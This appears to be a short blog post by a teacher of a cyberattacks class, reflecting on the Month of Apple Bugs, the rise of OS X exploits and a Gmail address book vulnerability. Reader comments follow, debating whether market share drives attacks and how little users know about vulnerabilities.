It’s too bad I’m not teaching my Cyberattacks class again this January, because the Month of Apple Bugs would be a great resource. I always run that class on Windows PCs because, statistically, there are just more Windows exploits out there right now, but it’s important to remember that no operating system is immune from exploits. We should definitely expect that, as Apple continues to grow their market share, OS X exploits will become more common too. What’s interesting is the number of exploits that aren’t just coming through traditional operating system holes anymore, but are taking advantage of online services that play some of the roles of an operating system, such as the recent Gmail address book vulnerability. None of the cases I’ve seen seem to require predictions of doom and destruction, but I anticpate that the next difficult push in security education is going to be educating the average user about the sheer breadth of vulnerable points in their average computer usage.
As any OS climbs the popularity market, it seems to make sense that more exploits would be available and worked on. After all, who would want to attack the less 10% of desktop computers with an attack?
The question is, is Windows really more vulnerable to attack than something like OS X or Linux, or is it just because it’s obviously the most frequent and therefore most attacked OS? That is a question open to debate, I don’t believe there is no real answer to any of that.
Vulnerabilities will always exist, there is no perfect code. The average user has no idea of the amount of vulnerabilities out there.
The average user will never know about the amount of vulnerabilities. After all, chances are this is the same user that Post-It Notes his username and password on the monitor.
It’s a constant war between designers trying to build better and more secure software, and the universe trying to design better and more incompetent idiots. So far the universe is winning.